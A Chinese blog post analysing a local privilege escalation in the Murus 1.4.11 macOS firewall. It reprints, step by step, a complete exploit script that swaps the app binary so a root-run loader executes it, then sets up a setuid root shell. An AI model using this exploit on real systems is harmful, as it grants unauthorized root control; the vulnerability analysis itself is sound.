Murus 1.4.11 - Local Privilege Escalation 漏洞简析

最新推荐文章于 2022-11-21 12:55:21 发布
最新推荐文章于 2022-11-21 12:55:21 发布
阅读量613 收藏
点赞数
分类专栏: 信息安全 linux 漏洞分析与利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012763794/article/details/79234081
版权

没有mac的苦逼就直接分析代码了

首先Murus是mac的防火墙,这个东西只要可以以admin权限运行就可以提权了

step1

首先我们看到编译一个c程序

cat > /tmp/murus411_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
  return 0;
}
EOF

gcc -o /tmp/murus411_exp /tmp/murus411_exp.c

if [ ! $? -eq 0 ] ; then
  rm -f /tmp/murus411_exp.c
    echo "failed to compile, dev tools may not be installed"
  exit 1
fi

rm -f /tmp/murus411_exp.c

看到这里我们就知道这应该是不正当权限运行程序导致的,先设置当前程序的uid和euid,之后执行/bin/bash

而$? 可以获取上一个命令的退出状态。所谓退出状态,就是上一个命令执行后的返回结果。

成功应该返回0,如果返回不是0说明编译有问题了

step2

之后又编译第二个程序

cat > /tmp/murus411_exp2.c <<EOF
#include <unistd.h>
#include <stdlib.h>
int main()
{
  setuid(0);
  seteuid(0);
  system("chown root:wheel /tmp/murus411_exp");
  system("chmod 4755 /tmp/murus411_exp");
  system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
Murus.app/Contents/MacOS/Murus");
  execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
  return 0;
}
EOF

gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
rm -f /tmp/murus411_exp2.c

这个就将第一个程序拥有者设置为0,并设置suid位,最后mv Murus.orig并执行

step3

查找进程MurusLoader,看看起来了没

while :
do
  ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
    |grep -v grep 1>/dev/null
  if [ $? -eq 0 ] ; then
    break
  fi
done

step4

mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
Contents/MacOS/Murus.orig
mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus

最后将原来的Murus替换为我们的exp2

那么问题就是MurusLoader以root权限执行/Applications/Murus.app/Contents/MacOS/Murus这个程序导致的问题了,这就是关键所在

step5

最后再检查下我们的文件的拥有者是不是root,之后就获得了root权限了

while :
do
  r=`ls -la /tmp/murus411_exp |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
done

echo "kapow"

/tmp/murus411_exp

小结

其实很多时候不应要利用内核漏洞去提权,这种以不当的权限启动程序的是一个很好的方法,之前分析nsa的工具的时候,很多都是利用这一点,简单方便,何乐而不为呢

有空总结一下提权的各种套路,大家可以提醒一下我

reference

https://www.exploit-db.com/exploits/43217/

giantbranch
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
murus-2.0.2.zip murus: 2.0.2 释放了macOS内置PF防火墙的强大功能使用非常简单的界面来保护您的网络资源
03-20
Murus释放了macOS内置PF防火墙的强大功能。使用非常简单的界面来保护您的网络资源,利用可用于设计和实施网络基础结构的许多专业功能,监视性能并主动过滤网络层的危险流量。 为了满足所有人的需求,Murus提供了三...
NetFilter权限提升
最新发布
m0_64053653的博客
01-19 331
linux内核漏洞
Only constant XPATH queries are supported
weixin_43403663的博客
11-21 642
Only constant XPATH queries are supported
DB2 issues anlysis
emilyzhang98的专栏
11-25 3859
 1 . DB21032N , SQLSTATE=58031   ---->The database directory cannot be found on the indicated file system.        Anlysis : IP ,HOSTNAME have been changed ,or db2cc cant find license issue.
新创建的数据库,执行db2look时,遇到package db2lkfun.bnd bind failed
laoshu2007的专栏
01-07 555
在新创建的数据库中,执行db2look的时候,存在这样的问题 db2v97i1@oc0644314035 ~]$ db2look -d sample -e -l -o db2look.ddl -- No userid was specified, db2look tries to use Environment variable USER -- USER is:...
手机控制电脑
10-20
01电脑控制电脑【请进入01文件夹】 02安卓电脑控制手机【请进入02文件夹】 03安卓手机控制电脑【请进入03文件夹】 04苹果手机控制电脑【请进入04文件夹】 05赠送电脑安装版tv10【请进入05文件夹】
Scudo 2.0 4 中文版 (超赞的mac防火墙)
04-29
Scudo 中文版是一款非常好的 macOS防火墙工具,防火墙系列工具中的新星,Scudo防火墙是 Murus 和 Vallum 的替代品。它将入站网络层数据包过滤器与出站应用层防火墙相结合。Scudo 有助于保护您的Mac网络服务免受来自...
searchsploit工具(exploit-db.com)使用实例 (linux 内核漏洞提权) exploitdb
whatday的专栏
10-30 5683
获取 root 权限是 Linux 漏洞利用的终极目标。跟 Windows 中的 System 用户一样,root 用户拥有对操作系统的所有管理权限。在渗透中,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的 root 用户,完全控制整个系统。 一般来说,获取到低权限 shell 后我们通常会做下面几件事: 1. 检测操作系统的发行版本 2. 查看内核版本 3...
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 735
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
xp提权localprivilege
08-28
Windows Local Privilege Escalation Vulnerability Exploit
sqlilabs less-26~26a
TA不懒,但还没有添加简介
07-18 389
sqlilabs less-26~26a
linux内核漏洞提权过程
focus on security
05-25 2298
获取 root 权限是 Linux 漏洞利用的终极目标。跟 Windows 中的 System 用户一样,root 用户拥有对操作系统的所有管理权限。在渗透中,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的 root 用户,完全控制整个系统。 一般来说,获取到低权限 shell 后我们通常会做下面几件事: 1. 检测操作系统的发行版本 2. 查看内核版本 3. 检测当前用户权限 4. 列举Suid文件 5. 查看已经安装的包,程序,运行的服务,过期的版本可能有漏洞
如何使用db2ReadLog读取数据库日志文件
ZhJinW的博客
03-21 2094
如何使用db2ReadLog读取数据库日志文件:1,拷贝sqllib/samples/c下的所有文件到本地文件位置:[db2inst1@localhost ~/db2test]$ cp -R ~/sqllib/samples/c .2,更改本地目录的权限使其能够创建修改文件[root@localhost db2test]# pwd/home/db2inst1-m/db2test[root@loca...
Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
cnbird's blog
02-06 745
http://www.securityfocus.com/data/vulnerabilities/exploits/36901.shhttp://www.securityfocus.com/data/vulnerabilities/exploits/36901-2.chttp://www.securityfocus.com/data/vulnerabilities/exploits/36
searchsploit 漏洞搜索
爱死亡机器人
05-16 920
文章目录1. 背景2. 简介3. 下载、安装、更新4. 语法5. 实例5.1 帮助5.2 搜索漏洞关键字afd的Windows本地利用漏洞5.3 搜索标题中包含oracle windows的漏洞5.4 搜索漏洞号为39446的漏洞5.5 排除dos以及PoC值的包含linux kernel 3.2的漏洞5.6 查找mssql的漏洞5.7 查找和window XP有关的漏洞5.8 查找apple的漏洞5.9 技巧 1. 背景 在提权过程中需要通过掌握的信息来对系统、软件等存在的漏洞进行搜索,获取其利用的po
ciscn2021-easy-sql无列名注入
soldi_er的博客
05-17 513
文章目录   登陆框。前端代码无信息。   部分黑名单字符:Union、Information、Sys、nno、column。   学到的东西: (1)Union的绕过,虽然比赛中绕不过去,但可以拓展绕过知识。 (2)查表的一些视图。 (3)无列名注入,通过表名可以查列名,无需union关键字。   前期报错注入,可以查到数据库名。 测试1:uname=1&passwd='。发现是MariaDB。 You have an error in your SQL syntax; check the ma
escape.alf.nu XSS Challenges 0-7 之一步步学XSS
giantbranch的专栏
05-28 9796
本文链接:http://blog.csdn.net/u012763794/article/details/51507593 以下挑战来源于:http://escape.alf.nu/ 你可能需要html,css,javascript的知识,没有的赶紧学吧 challenge 0 function escape(s) { // Warmup. return

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值